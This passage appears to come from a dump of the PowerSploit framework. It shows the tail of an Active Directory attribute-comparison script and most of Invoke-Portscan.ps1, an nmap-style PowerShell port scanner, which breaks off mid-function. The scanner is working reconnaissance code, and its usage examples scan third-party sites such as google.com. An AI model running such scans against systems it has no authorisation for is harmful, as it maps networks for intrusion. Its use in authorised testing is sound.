\"msRASSavedFramedIPAddress\",\n        \"msRASSavedFramedRoute\",\n        \"msRTCSIP-AcpInfo\",\n        \"msRTCSIP-ApplicationOptions\",\n        \"msRTCSIP-ArchivingEnabled\",\n        \"msRTCSIP-DeploymentLocator\",\n        \"msRTCSIP-FederationEnabled\",\n        \"msRTCSIP-GroupingID\",\n        \"msRTCSIP-InternetAccessEnabled\",\n        \"msRTCSIP-Line\",\n        \"msRTCSIP-LineServer\",\n        \"msRTCSIP-OptionFlags\",\n        \"msRTCSIP-OriginatorSid\",\n        \"msRTCSIP-OwnerUrn\",\n        \"msRTCSIP-PrimaryHomeServer\",\n        \"msRTCSIP-PrimaryUserAddress\",\n        \"msRTCSIP-PrivateLine\",\n        \"msRTCSIP-TargetHomeServer\",\n        \"msRTCSIP-TargetUserPolicies\",\n        \"msRTCSIP-TenantId\",\n        \"msRTCSIP-UserEnabled\",\n        \"msRTCSIP-UserExtension\",\n        \"msRTCSIP-UserLocationProfile\",\n        \"msRTCSIP-UserPolicies\",\n        \"msRTCSIP-UserPolicy\",\n        \"msRTCSIP-UserRoutingGroupId\",\n        \"msSFU30Aliases\",\n        \"msSFU30Name\",\n        \"msSFU30NisDomain\",\n        \"msSFU30PosixMemberOf\",\n        \"msTPM-OwnerInformation\",\n        \"msTPM-TpmInformationForComputer\",\n        \"msTSAllowLogon\",\n        \"msTSBrokenConnectionAction\",\n        \"msTSConnectClientDrives\",\n        \"msTSConnectPrinterDrives\",\n        \"msTSDefaultToMainPrinter\",\n        \"msTSEndpointData\",\n        \"msTSEndpointPlugin\",\n        \"msTSEndpointType\",\n        \"msTSExpireDate\",\n        \"msTSExpireDate2\",\n        \"msTSExpireDate3\",\n        \"msTSExpireDate4\",\n        \"msTSHomeDirectory\",\n        \"msTSHomeDrive\",\n        \"msTSInitialProgram\",\n        \"msTSLicenseVersion\",\n        \"msTSLicenseVersion2\",\n        \"msTSLicenseVersion3\",\n        \"msTSLicenseVersion4\",\n        \"msTSLSProperty01\",\n        \"msTSLSProperty02\",\n        \"msTSManagingLS\",\n        \"msTSManagingLS2\",\n        \"msTSManagingLS3\",\n        \"msTSManagingLS4\",\n        \"msTSMaxConnectionTime\",\n        \"msTSMaxDisconnectionTime\",\n        \"msTSMaxIdleTime\",\n        \"msTSPrimaryDesktop\",\n        \"msTSPrimaryDesktopBL\",\n        \"msTSProfilePath\",\n        \"msTSProperty01\",\n        \"msTSProperty02\",\n        \"msTSReconnectionAction\",\n        \"msTSRemoteControl\",\n        \"msTSSecondaryDesktopBL\",\n        \"msTSSecondaryDesktops\",\n        \"msTSWorkDirectory\",\n        \"name\",\n        \"netbootDUID\",\n        \"netbootGUID\",\n        \"netbootInitialization\",\n        \"netbootMachineFilePath\",\n        \"netbootMirrorDataFile\",\n        \"netbootSCPBL\",\n        \"netbootSIFFile\",\n        \"networkAddress\",\n        \"nisMapName\",\n        \"nonSecurityMemberBL\",\n        \"ntPwdHistory\",\n        \"nTSecurityDescriptor\",\n        \"o\",\n        \"objectCategory\",\n        \"objectClass\",\n        \"objectGUID\",\n        \"objectVersion\",\n        \"operatingSystem\",\n        \"operatingSystemHotfix\",\n        \"operatingSystemServicePack\",\n        \"operatingSystemVersion\",\n        \"operatorCount\",\n        \"otherFacsimileTelephoneNumber\",\n        \"otherHomePhone\",\n        \"otherIpPhone\",\n        \"otherLoginWorkstations\",\n        \"otherMailbox\",\n        \"otherMobile\",\n        \"otherPager\",\n        \"otherTelephone\",\n        \"otherWellKnownObjects\",\n        \"ou\",\n        \"ownerBL\",\n        \"pager\",\n        \"partialAttributeDeletionList\",\n        \"partialAttributeSet\",\n        \"personalPager\",\n        \"personalTitle\",\n        \"photo\",\n        \"physicalDeliveryOfficeName\",\n        \"physicalLocationObject\",\n        \"policyReplicationFlags\",\n        \"possibleInferiors\",\n        \"postalAddress\",\n        \"postalCode\",\n        \"postOfficeBox\",\n        \"preferredDeliveryMethod\",\n        \"preferredLanguage\",\n        \"preferredOU\",\n        \"primaryGroupID\",\n        \"primaryInternationalISDNNumber\",\n        \"primaryTelexNumber\",\n        \"profilePath\",\n        \"promoExpiration\",\n        \"proxiedObjectName\",\n        \"proxyAddresses\",\n        \"pwdLastSet\",\n        \"queryPolicyBL\",\n        \"registeredAddress\",\n        \"replPropertyMetaData\",\n        \"replUpToDateVector\",\n        \"repsFrom\",\n        \"repsTo\",\n        \"revision\",\n        \"rIDSetReferences\",\n        \"roomNumber\",\n        \"scriptPath\",\n        \"sDRightsEffective\",\n        \"secretary\",\n        \"securityProtocol\",\n        \"seeAlso\",\n        \"serialNumber\",\n        \"serverReferenceBL\",\n        \"servicePrincipalName\",\n        \"showInAdvancedViewOnly\",\n        \"siteGUID\",\n        \"siteObjectBL\",\n        \"sn\",\n        \"st\",\n        \"street\",\n        \"streetAddress\",\n        \"structuralObjectClass\",\n        \"subRefs\",\n        \"subSchemaSubEntry\",\n        \"systemFlags\",\n        \"telephoneAssistant\",\n        \"telephoneNumber\",\n        \"teletexTerminalIdentifier\",\n        \"telexNumber\",\n        \"terminalServer\",\n        \"thumbnailLogo\",\n        \"thumbnailPhoto\",\n        \"title\",\n        \"trackingLogPathName\",\n        \"type\",\n        \"uid\",\n        \"unicodePwd\",\n        \"url\",\n        \"userAccountControl\",\n        \"userCertificate\",\n        \"userParameters\",\n        \"userPassword\",\n        \"userPKCS12\",\n        \"userPrincipalName\",\n        \"userSharedFolder\",\n        \"userSharedFolderOther\",\n        \"userSMIMECertificate\",\n        \"userWorkstations\",\n        \"uSNChanged\",\n        \"uSNCreated\",\n        \"uSNDSALastObjRemoved\",\n        \"USNIntersite\",\n        \"uSNLastObjRem\",\n        \"uSNSource\",\n        \"volumeCount\",\n        \"wbemPath\",\n        \"wellKnownObjects\",\n        \"whenChanged\",\n        \"whenCreated\",\n        \"wWWHomePage\",\n        \"x121Address\",\n        \"x500uniqueIdentifier\"\n        )\n    $Compare = Compare-Object -ReferenceObject $ComputerAttributeList -DifferenceObject $ComputerAttributeListFromAD\n    Write-Output $Compare\n    }\n    }\n}\n    "
  },
  {
    "path": "Recon/Invoke-Portscan.ps1",
    "content": "function Invoke-Portscan\n{\n<#\n.SYNOPSIS\n\nSimple portscan module\n\nPowerSploit Function: Invoke-Portscan  \nAuthor: Rich Lundeen (http://webstersProdigy.net)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nDoes a simple port scan using regular sockets, based (pretty) loosely on nmap\n\n.PARAMETER Hosts\n\nInclude these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in\n\n.PARAMETER HostFile\n\nInput hosts from file rather than commandline\n\n.PARAMETER ExcludeHosts\n\nExclude these comma seperated hosts\n\n.PARAMETER Ports\n\nInclude these comma seperated ports (can also be a range like 80-90)\n\n.PARAMETER PortFile\n\nInput ports from a file\n\n.PARAMETER TopPorts\n\nInclude the x top ports - only goes to 1000, default is top 50\n\n.PARAMETER ExcludedPorts\n\nExclude these comma seperated ports\n\n.PARAMETER SkipDiscovery\n\nTreat all hosts as online, skip host discovery\n\n.PARAMETER PingOnly\n\nPing scan only (disable port scan)\n\n.PARAMETER DiscoveryPorts\n\nComma separated ports used for host discovery. -1 is a ping\n\n.PARAMETER Threads\n\nnumber of max threads for the thread pool (per host)\n\n.PARAMETER nHosts\n\nnumber of hosts to concurrently scan\n\n.PARAMETER Timeout\n\nTimeout time on a connection in miliseconds before port is declared filtered\n\n.PARAMETER SleepTimer\n\nWait before thread checking, in miliseconds\n\n.PARAMETER SyncFreq\n\nHow often (in terms of hosts) to sync threads and flush output\n\n.PARAMETER T\n\n[0-5] shortcut performance options. Default is 3. higher is more aggressive. Sets (nhosts, threads,timeout)\n    5 {$nHosts=30;  $Threads = 1000; $Timeout = 750  }\n    4 {$nHosts=25;  $Threads = 1000; $Timeout = 1200 }\n    3 {$nHosts=20;  $Threads = 100;  $Timeout = 2500 }\n    2 {$nHosts=15;  $Threads = 32;   $Timeout = 3000 }\n    1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }\n\n.PARAMETER GrepOut\n\nGreppable output file\n\n.PARAMETER XmlOut\n\noutput XML file\n\n.PARAMETER ReadableOut\n\noutput file in 'readable' format\n\n.PARAMETER AllformatsOut\n\noutput in readable (.nmap), xml (.xml), and greppable (.gnmap) formats\n\n.PARAMETER noProgressMeter\n\nSuppresses the progress meter\n\n.PARAMETER quiet\n\nsupresses returned output and don't store hosts in memory - useful for very large scans\n\n.PARAMETER ForceOverwrite\n\nForce Overwrite if output Files exist. Otherwise it throws exception\n\n.EXAMPLE\n\nInvoke-Portscan -Hosts \"webstersprodigy.net,google.com,microsoft.com\" -TopPorts 50\n\nDescription\n-----------\nScans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com\n\n.EXAMPLE\n\necho webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports \"80,443,8080\"\n\nDescription\n-----------\nDoes a portscan of \"webstersprodigy.net\", and writes a greppable output file\n\n.EXAMPLE\n\nInvoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet\n\nDescription\n-----------\nScans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats\n\n.LINK\n\nhttp://webstersprodigy.net\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseLiteralInitializerForHashtable', '')]\n    [CmdletBinding()]\n    Param (\n        #Host, Ports\n        [Parameter(ParameterSetName=\"cmdHosts\",\n\n                   ValueFromPipeline=$True,\n                   Mandatory = $True)]\n                   [String[]] $Hosts,\n\n        [Parameter(ParameterSetName=\"fHosts\",\n                   Mandatory = $True)]\n                   [Alias(\"iL\")]\n                   [String]  $HostFile,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"exclude\")]\n                   [String] $ExcludeHosts,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"p\")]\n                   [String] $Ports,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"iP\")]\n                   [String] $PortFile,\n\n        [Parameter(Mandatory = $False)]\n                   [String] $TopPorts,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"xPorts\")]\n                   [String] $ExcludedPorts,\n\n        #Host Discovery\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"Pn\")]\n                   [Switch] $SkipDiscovery,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"sn\")]\n                   [Switch] $PingOnly,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"PS\")]\n                   [string] $DiscoveryPorts = \"-1,445,80,443\",\n\n        #Timing and Performance\n        [Parameter(Mandatory = $False)]\n                   [int] $Threads = 100,\n\n        [Parameter(Mandatory = $False)]\n                   [int] $nHosts = 25,\n\n        [Parameter(Mandatory = $False)]\n                   [int] $Timeout = 2000,\n\n        [Parameter(Mandatory = $False)]\n                   [int] $SleepTimer = 500,\n\n        [Parameter(Mandatory = $False)]\n                   [int] $SyncFreq = 1024,\n\n        [Parameter(Mandatory = $False)]\n                   [int] $T,\n\n        #Output\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"oG\")]\n                   [String] $GrepOut,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"oX\")]\n                   [String] $XmlOut,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"oN\")]\n                   [String] $ReadableOut,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"oA\")]\n                   [String] $AllformatsOut,\n\n        [Parameter(Mandatory = $False)]\n                   [Switch] $noProgressMeter,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"q\")]\n                   [Switch] $quiet,\n\n        [Parameter(Mandatory = $False)]\n                   [Alias(\"F\")]\n                   [Switch] $ForceOverwrite\n\n        #TODO add script parameter\n        #TODO add resume parameter\n    )\n\n    PROCESS {\n\n        Set-StrictMode -Version 2.0\n\n        $version = .13\n        $hostList = New-Object System.Collections.ArrayList\n        $portList = New-Object System.Collections.ArrayList\n        $hostPortList = New-Object System.Collections.ArrayList\n\n        $scannedHostList = @()\n\n        function Parse-Hosts\n        {\n            Param (\n                [Parameter(Mandatory = $True)] [String] $Hosts\n            )\n\n            [String[]] $iHosts = $Hosts.Split(\",\")\n\n            $IPRangeRegex = \"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}-\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\"\n\n            foreach($iHost in $iHosts)\n            {\n                $iHost = $iHost.Replace(\" \", \"\")\n\n                if(!$iHost)\n                {\n                    continue\n                }\n\n                if($iHost.contains(\"/\"))\n                {\n                    $netPart = $iHost.split(\"/\")[0]\n                    [uint32]$maskPart = $iHost.split(\"/\")[1]\n\n                    $address = [System.Net.IPAddress]::Parse($netPart)\n\n                    if ($maskPart -ge $address.GetAddressBytes().Length * 8)\n                    {\n                        throw \"Bad host mask\"\n                    }\n\n                    $numhosts = [System.math]::Pow(2,(($address.GetAddressBytes().Length *8) - $maskPart))\n\n                    $startaddress = $address.GetAddressBytes()\n                    [array]::Reverse($startaddress)\n\n                    $startaddress = [System.BitConverter]::ToUInt32($startaddress, 0)\n                    [uint32]$startMask = ([System.math]::Pow(2, $maskPart)-1) * ([System.Math]::Pow(2,(32 - $maskPart)))\n                    $startAddress = $startAddress -band $startMask\n\n                    #in powershell 2.0 there are 4 0 bytes padded, so the [0..3] is necessary\n                    $startAddress = [System.BitConverter]::GetBytes($startaddress)[0..3]\n                    [array]::Reverse($startaddress)\n\n                    $address = [System.Net.IPAddress] [byte[]] $startAddress\n\n                    $hostList.Add($address.IPAddressToString)\n\n                    for ($i=0; $i -lt $numhosts-1; $i++)\n                    {\n\n                        $nextAddress =  $address.GetAddressBytes()\n                        [array]::Reverse($nextAddress)\n                        $nextAddress =  [System.BitConverter]::ToUInt32($nextAddress, 0)\n                        $nextAddress ++\n                        $nextAddress = [System.BitConverter]::GetBytes($nextAddress)[0..3]\n                        [array]::Reverse($nextAddress)\n\n                        $address = [System.Net.IPAddress] [byte[]] $nextAddress\n                        $hostList.Add($address.IPAddressToString)\n\n                    }\n\n                }\n\n                if($iHost -match $IPRangeRegex)\n                {\n\n                $iHostPart1 = ($iHost.Split(\"-\"))[0]\n                $iHostPart2 = ($iHost.Split(\"-\"))[1]       \n\n                $LowerBound = $iHostPart1.Split(\".\")\n                $UpperBound = $iHostPart2.Split(\".\")\n\n                $LowerBoundInt = ($LowerBound[0].ToInt32($null),$LowerBound[1].ToInt32($null),$LowerBound[2].ToInt32($null),$LowerBound[3].ToInt32($null))\n                $UpperBoundInt = ($UpperBound[0].ToInt32($null),$UpperBound[1].ToInt32($null),$UpperBound[2].ToInt32($null),$UpperBound[3].ToInt32($null))\n\n                $CurrentIP = $LowerBoundInt\n                $CurrentIPString = $null\n                $ControlArray = @(0,0,0,0)\n\n                $null = $hostList.Add($iHostPart1)\n\n                    while($CurrentIPString -ne $iHostPart2)\n                    {\n                        for($i=0;$i -lt 4;$i++)\n                        {\n\n                            if(($CurrentIP[$i] -eq $UpperBoundInt[$i]) -and (($i -eq 0) -or $ControlArray[$i-1] -eq 1))\n                            {\n                                $ControlArray[$i] = 1\n                                continue\n                            }\n                            else\n                            {\n        \n                                $Max = 254\n                                if(($i -ne 0) -and ($ControlArray[$i-1] -eq 1))\n                                {\n                                    $Max = $UpperBoundInt[$i]   \n                                }\n\n                                if(($i -ne 3) -and ($CurrentIP[$i+1] -eq 254))\n                                {\n                                    $CurrentIP[$i]++\n                                    $CurrentIP[$i+1]=0\n\n                                    $CurrentIPString = ($CurrentIP[0].ToString() + \".\" + $CurrentIP[1].ToString() + \".\" + $CurrentIP[2].ToString() + \".\" + $CurrentIP[3].ToString())\n                                    $null = $hostList.Add($CurrentIPString)\n                                }\n\n                                if(($i -eq 3) -and ($CurrentIP[$i] -lt $Max))\n                                {\n                                    $CurrentIP[$i]++\n\n                                    $CurrentIPString = ($CurrentIP[0].ToString() + \".\" + $CurrentIP[1].ToString() + \".\" + $CurrentIP[2].ToString() + \".\" + $CurrentIP[3].ToString())\n                                    $null = $hostList.Add($CurrentIPString)\n                                }\n                            }\n                        }\n                    }\n  \n                }\n                else\n                {\n                    $hostList.Add($iHost)\n                }\n            }\n        }\n\n        function Parse-ILHosts\n        {\n           Param (\n                [Parameter(Mandatory = $True)] [String] $HostFile\n            )\n\n            Get-Content $HostFile | ForEach-Object {\n                Parse-Hosts $_\n            }\n        }\n\n        function Exclude-Hosts\n        {\n            Param (\n                [Parameter(Mandatory = $True)] [String] $excludeHosts\n            )\n\n            [String[]] $iHosts = $excludeHosts.Split(\",\")\n\n            foreach($iHost in $iHosts)\n            {\n                $iHost = $iHost.Replace(\" \", \"\")\n                $hostList.Remove($iHost)\n            }\n        }\n\n        function Get-TopPort\n        {\n            Param (\n                [Parameter(Mandatory = $True)]\n                [ValidateRange(1,1000)]\n                [int] $numPorts\n            )\n\n            #list of top 1000 ports from nmap from Jun 2013\n            [int[]] $topPortList = @(80,23,443,21,3389,110,445,139,143,53,135,3306,8080,22\n                        1723,111,995,993,5900,1025,1720,548,113,81,6001,179,1026,2000,8443,\n                        8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646,5000,\n                        5631,631,49153,8081,2049,88,79,5800,106,2121,1110,49155,6000,513,\n                        990,5357,49156,543,544,5101,144,7,389,8009,9999,5009,7070,5190,3000,\n                        5432,1900,3986,13,1029,9,5051,6646,49157,1028,873,1755,2717,4899,9100,\n                        119,37,1000,3001,5001,82,10010,1030,9090,2107,1024,2103,6004,1801,\n                        5050,19,8031,1041,255,1048,1049,1053,1054,1056,1064,3703,17,808,3689,\n                        1031,1044,1071,5901,100,9102,2869,4001,5120,8010,9000,2105,636,1038,\n                        2601,1,7000,1066,1069,625,311,280,254,4000,1761,5003,2002,1998,2005,\n                        1032,1050,6112,1521,2161,6002,2401,902,4045,787,7937,1058,2383,1033,\n                        1040,1059,50000,5555,1494,3,593,2301,3268,7938,1022,1234,1035,1036,1037,\n                        1074,8002,9001,464,497,1935,2003,6666,6543,24,1352,3269,1111,407,500,\n                        20,2006,1034,1218,3260,15000,4444,264,33,2004,1042,42510,999,3052,1023,\n                        222,1068,888,7100,1717,992,2008,7001,2007,8082,512,1043,2009,5801,1700,\n                        7019,50001,4662,2065,42,2602,3333,9535,5100,2604,4002,5002,1047,1051,1052,\n                        1055,1060,1062,1311,3283,4443,5225,5226,6059,6789,8089,8651,8652,8701,9415,\n                        9593,9594,9595,16992,16993,20828,23502,32769,33354,35500,52869,55555,55600,\n                        64623,64680,65000,65389,1067,13782,366,5902,9050,85,1002,5500,1863,1864,\n                        5431,8085,10243,45100,49999,51103,49,90,6667,1503,6881,27000,340,1500,8021,\n                        2222,5566,8088,8899,9071,5102,6005,9101,163,5679,146,648,1666,83,3476,5004,\n                        5214,8001,8083,8084,9207,14238,30,912,12345,2030,2605,6,541,4,1248,3005,8007,\n                        306,880,2500,1086,1088,2525,4242,8291,9009,52822,900,6101,2809,7200,211,800,\n                        987,1083,12000,705,711,20005,6969,13783,1045,1046,1061,1063,1070,1072,1073,\n                        1075,1077,1078,1079,1081,1082,1085,1093,1094,1096,1098,1099,1100,1104,1106,\n                        1107,1108,1148,1169,1272,1310,1687,1718,1783,1840,2100,2119,2135,2144,2160,\n                        2190,2260,2381,2399,2492,2607,2718,2811,2875,3017,3031,3071,3211,3300,3301,\n                        3323,3325,3351,3404,3551,3580,3659,3766,3784,3801,3827,3998,4003,4126,4129,\n                        4449,5222,5269,5633,5718,5810,5825,5877,5910,5911,5925,5959,5960,5961,5962,\n                        5987,5988,5989,6123,6129,6156,6389,6580,6901,7106,7625,7777,7778,7911,8086,\n                        8181,8222,8333,8400,8402,8600,8649,8873,8994,9002,9011,9080,9220,9290,9485,\n                        9500,9502,9503,9618,9900,9968,10002,10012,10024,10025,10566,10616,10617,10621,\n                        10626,10628,10629,11110,13456,14442,15002,15003,15660,16001,16016,16018,17988,\n                        19101,19801,19842,20000,20031,20221,20222,21571,22939,24800,25734,27715,28201,\n                        30000,30718,31038,32781,32782,33899,34571,34572,34573,40193,48080,49158,49159,\n                        49160,50003,50006,50800,57294,58080,60020,63331,65129,691,212,1001,1999,2020,\n                        2998,6003,7002,50002,32,2033,3372,99,425,749,5903,43,458,5405,6106,6502,7007,\n                        13722,1087,1089,1124,1152,1183,1186,1247,1296,1334,1580,1782,2126,2179,2191,2251,\n                        2522,3011,3030,3077,3261,3493,3546,3737,3828,3871,3880,3918,3995,4006,4111,4446,\n                        5054,5200,5280,5298,5822,5859,5904,5915,5922,5963,7103,7402,7435,7443,7512,8011,\n                        8090,8100,8180,8254,8500,8654,9091,9110,9666,9877,9943,9944,9998,10004,10778,15742,\n                        16012,18988,19283,19315,19780,24444,27352,27353,27355,32784,49163,49165,49175,\n                        50389,50636,51493,55055,56738,61532,61900,62078,1021,9040,666,700,84,545,1112,\n                        1524,2040,4321,5802,38292,49400,1084,1600,2048,2111,3006,6547,6699,9111,16080,\n                        555,667,720,801,1443,1533,2106,5560,6007,1090,1091,1114,1117,1119,1122,1131,1138,\n                        1151,1175,1199,1201,1271,1862,2323,2393,2394,2608,2725,2909,3003,3168,3221,3322,\n                        3324,3390,3517,3527,3800,3809,3814,3826,3869,3878,3889,3905,3914,3920,3945,3971,\n                        4004,4005,4279,4445,4550,4567,4848,4900,5033,5080,5087,5221,5440,5544,5678,5730,\n                        5811,5815,5850,5862,5906,5907,5950,5952,6025,6510,6565,6567,6689,6692,6779,6792,\n                        6839,7025,7496,7676,7800,7920,7921,7999,8022,8042,8045,8093,8099,8200,8290,8292,\n                        8300,8383,9003,9081,9099,9200,9418,9575,9878,9898,9917,10003,10180,10215,11111,\n                        12174,12265,14441,15004,16000,16113,17877,18040,18101,19350,25735,26214,27356,\n                        30951,32783,32785,40911,41511,44176,44501,49161,49167,49176,50300,50500,52673,\n                        52848,54045,54328,55056,56737,57797,60443,70,417,714,722,777,981,1009,2022,4224,\n                        4998,6346,301,524,668,765,2041,5999,10082,259,1007,1417,1434,1984,2038,2068,4343,\n                        6009,7004,44443,109,687,726,911,1461,2035,4125,6006,7201,9103,125,481,683,903,\n                        1011,1455,2013,2043,2047,6668,6669,256,406,843,2042,2045,5998,9929,31337,44442,\n                        1092,1095,1102,1105,1113,1121,1123,1126,1130,1132,1137,1141,1145,1147,1149,1154,\n                        1164,1165,1166,1174,1185,1187,1192,1198,1213,1216,1217,1233,1236,1244,1259,1277,\n                        1287,1300,1301,1309,1322,1328,1556,1641,1688,1719,1721,1805,1812,1839,1875,1914,\n                        1971,1972,1974,2099,2170,2196,2200,2288,2366,2382,2557,2800,2910,2920,2968,3007,\n                        3013,3050,3119,3304,3307,3376,3400,3410,3514,3684,3697,3700,3824,3846,3848,3859,\n                        3863,3870,3872,3888,3907,3916,3931,3941,3957,3963,3968,3969,3972,3990,3993,3994,\n                        4009,4040,4080,4096,4143,4147,4200,4252,4430,4555,4600,4658,4875,4949,5040,5063,\n                        5074,5151,5212,5223,5242,5279,5339,5353,5501,5807,5812,5818,5823,5868,5869,5899,\n                        5905,5909,5914,5918,5938,5940,5968,5981,6051,6060,6068,6203,6247,6500,6504,6520,\n                        6550,6600)\n            $numPorts--\n            $portList.AddRange($topPortList[0..$numPorts])\n        }\n\n        function Parse-Ports\n        {\n            Param (\n                [Parameter(Mandatory = $True)] [String] $Ports,\n                [Parameter(Mandatory = $True)] $pList\n            )\n\n            foreach ($pRange in $Ports.Split(\",\"))\n            {\n\n                #-1 is a special case for ping\n                if ($pRange -eq \"-1\")\n                {\n                    $pList.Add([int]$pRange)\n                }\n                elseif ($pRange.Contains(\"-\"))\n                {\n                    [int[]] $range = $pRange.Split(\"-\")\n                    if ($range.Count -ne 2 -or $pRange.Split(\"-\")[0] -eq \"\" -or $pRange.split(\"-\")[1] -eq \"\")\n                    {\n                        throw \"Invalid port range\"\n                    }\n\n                    $pList.AddRange($range[0]..$range[1])\n                }\n                else\n                {\n                    $pList.Add([int]$pRange)\n                }\n\n            }\n            foreach ($p in $pList)\n            {\n                if ($p -lt -1 -or $p -gt 65535)\n                {\n                    throw \"Port $p out of range\"\n                }\n            }\n         }\n\n        function Parse-IpPorts\n        {\n           Param (\n                [Parameter(Mandatory = $True)] [String] $PortFile\n            )\n\n            Get-Content $PortFile | ForEach-Object {\n                Parse-Ports -Ports $_ -pList $portList\n            }\n        }\n\n        function Remove-Ports\n        {\n            Param (\n                [Parameter(Mandatory = $True)] [string] $ExcludedPorts\n            )\n\n            [int[]] $ExcludedPorts = $ExcludedPorts.Split(\",\")\n\n            foreach ($x in $ExcludedPorts)\n            {\n                $portList.Remove($x)\n            }\n        }\n\n        function Write-PortscanOut\n        {\n            Param (\n                [Parameter(Mandatory = $True, ParameterSetName=\"Comment\")] [string] $comment,\n                [Parameter(Mandatory = $True, ParameterSetName=\"HostOut\")] [string] $outhost,\n                [Parameter(Mandatory = $True, ParameterSetName=\"HostOut\")] [bool] $isUp,\n                [Parameter(Mandatory = $True, ParameterSetName=\"HostOut\")] $openPorts,\n                [Parameter(Mandatory = $True, ParameterSetName=\"HostOut\")] $closedPorts,\n                [Parameter(Mandatory = $True, ParameterSetName=\"HostOut\")] $filteredPorts,\n                [Parameter()] [bool] $SkipDiscovery,\n                [Parameter()] [System.IO.StreamWriter] $grepStream,\n                [Parameter()] [System.Xml.XmlWriter] $xmlStream,\n                [Parameter()] [System.IO.StreamWriter] $readableStream\n\n            )\n            switch ($PSCmdlet.ParameterSetName)\n            {\n                \"Comment\"\n                {\n\n                    Write-Verbose $comment\n\n                    if ($grepStream) {\n                        $grepStream.WriteLine(\"# \" + $comment)\n                    }\n                    if ($xmlStream) {\n                        $xmlStream.WriteComment($comment)\n                    }\n                    if ($readableStream) {\n                        $readableStream.WriteLine($comment)\n                    }\n                }\n                \"HostOut\"\n                {\n                    $oPort = [string]::join(\",\", $openPorts.ToArray())\n                    $cPort = [string]::join(\",\", $closedPorts.ToArray())\n                    $fPort = [string]::join(\",\", $filteredPorts.ToArray())\n\n                    if ($grepStream) {\n                       #for grepstream use tabs - can be ugly, but easier for regex\n                       if ($isUp -and !$SkipDiscovery) {\n                            $grepStream.writeline(\"Host: $outhost`tStatus: Up\")\n                        }\n                        if ($isUp -or $SkipDiscovery) {\n                            if ($oPort -ne \"\") {\n                                $grepStream.writeline(\"Host: $outhost`tOpen Ports: $oPort\")\n                            }\n                            if ($cPort -ne \"\") {\n                                $grepStream.writeline(\"Host: $outhost`tClosed Ports: $cPort\")\n                            }\n                            if ($fPort -ne \"\") {\n                                $grepStream.writeline(\"Host: $outhost`tFiltered Ports: $fPort\")\n                            }\n                        }\n                        elseif (!$SkipDiscovery) {\n                            $grepStream.writeline(\"Host: $outhost`tStatus: Down\")\n                        }\n                    }\n                    if ($xmlStream) {\n                        $xmlStream.WriteStartElement(\"Host\")\n\n                        $xmlStream.WriteAttributeString(\"id\", $outhost)\n                        if (!$SkipDiscovery) {\n                            if ($isUp) {\n                                $xmlStream.WriteAttributeString(\"Status\", \"Up\")\n                             }\n                             else {\n                                $xmlStream.WriteAttributeString(\"Status\", \"Downs\")\n                             }\n                        }\n\n                        $xmlStream.WriteStartElement(\"Ports\")\n                        foreach($p in $openPorts) {\n                            $xmlStream.writestartElement(\"Port\")\n                            $xmlStream.WriteAttributeString(\"id\", [string]$p)\n                            $xmlStream.WriteAttributeString(\"state\", \"open\")\n                            $xmlStream.WriteEndElement()\n\n                        }\n                        foreach ($p in $closedPorts) {\n                            $xmlStream.writestartElement(\"Port\")\n                            $xmlStream.WriteAttributeString(\"id\", [string]$p)\n                            $xmlStream.WriteAttributeString(\"state\", \"closed\")\n                            $xmlStream.WriteEndElement()\n                        }\n                        foreach ($p in $filteredPorts) {\n                            $xmlStream.writestartElement(\"Port\")\n                            $xmlStream.WriteAttributeString(\"id\", [string]$p)\n                            $xmlStream.WriteAttributeString(\"state\", \"filtered\")\n                            $xmlStream.WriteEndElement()\n                        }\n\n                        $xmlStream.WriteEndElement()\n                        $xmlStream.WriteEndElement()\n                    }\n                    if ($readableStream) {\n                        $readableStream.writeline(\"Porscan.ps1 scan report for $outhost\")\n                        if ($isUp) {\n                            $readableStream.writeline(\"Host is up\")\n                        }\n\n                        if ($isUp -or $SkipDiscovery) {\n\n                            $readableStream.writeline((\"{0,-10}{1,0}\" -f \"PORT\", \"STATE\"))\n\n                            [int[]]$allports = $openPorts + $closedPorts + $filteredPorts\n                            foreach($p in ($allports| Sort-Object))\n                            {\n                                if ($openPorts.Contains($p)) {\n                                    $readableStream.writeline((\"{0,-10}{1,0}\" -f $p, \"open\"))\n                                }\n                                elseif ($closedPorts.Contains($p)) {\n                                    $readableStream.writeline((\"{0,-10}{1,0}\" -f $p, \"closed\"))\n                                }\n                                elseif ($filteredPorts.Contains($p)) {\n                                    $readableStream.writeline((\"{0,-10}{1,0}\" -f $p, \"filtered\"))\n                                }\n                            }\n\n                        }\n                        elseif(!$SkipDiscovery) {\n                            $readableStream.writeline(\"Host is Down\")\n                        }\n                        $readableStream.writeline(\"\")\n                    }\n                }\n            }\n        }\n\n        #function for Powershell v2.0 to work\n        function Convert-SwitchtoBool\n        {\n            Param (\n                [Parameter(Mandatory = $True)] $switchValue\n            )\n            If ($switchValue) {\n                return $True\n            